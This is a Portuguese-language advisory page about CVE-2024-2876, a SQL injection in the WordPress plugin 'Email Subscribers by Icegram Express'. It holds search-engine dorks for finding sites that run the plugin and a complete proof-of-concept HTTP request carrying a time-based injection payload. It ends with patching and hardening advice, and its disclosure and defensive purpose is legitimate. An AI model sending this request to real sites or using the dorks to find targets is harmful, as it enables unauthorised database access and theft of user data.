
Exploit de prova de conceito para uma vulnerabilidade crítica de injeção SQL no plugin WordPress Email Subscribers. Inclui detalhes de exploração, requisição HTTP e dorks de busca.
O CVE-2024-2876 é uma vulnerabilidade crítica de segurança encontrada no plugin "Email Subscribers by Icegram Express" para WordPress. Essa vulnerabilidade afeta versões até 5.7.14 inclusive e representa riscos significativos para mais de 90.000 sites.
A vulnerabilidade é uma falha de injeção de SQL que permite que atacantes não autenticados executem consultas SQL maliciosas nos bancos de dados WordPress afetados. Ao manipular entradas de usuário que não são devidamente sanitizadas, os atacantes podem extrair informações sensíveis, como nomes de usuário, endereços de e-mail, hashes de senhas e listas de assinantes.
A injeção de SQL ocorre dentro da função run da classe IG_ES_Subscribers_Query do plugin, onde a validação inadequada de entradas leva à execução não autorizada de código SQL. Isso compromete a integridade e a confidencialidade dos dados armazenados no banco de dados WordPress.
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Atualização Imediata: Se você estiver usando o plugin "Email Subscribers by Icegram Express", atualize para a versão 5.7.15 ou posterior imediatamente para aplicar a correção de segurança.
Auditorias Regulares: Revise e atualize regularmente todos os plugins e temas do WordPress para suas versões mais recentes, garantindo a segurança.
Plugins de Segurança: Use plugins de segurança do WordPress respeitados para reforçar as defesas contra injeção de SQL e outras ameaças cibernéticas.
Políticas de Senhas Fortes: Implemente senhas fortes e únicas para todas as contas relacionadas ao seu site WordPress para reduzir os riscos de acesso não autorizado.
Não atualizar o plugin afetado pode deixar os sites vulneráveis a violações de dados e acesso não autorizado. Dado o uso generalizado desse plugin, a ação imediata é crucial para proteger as instalações.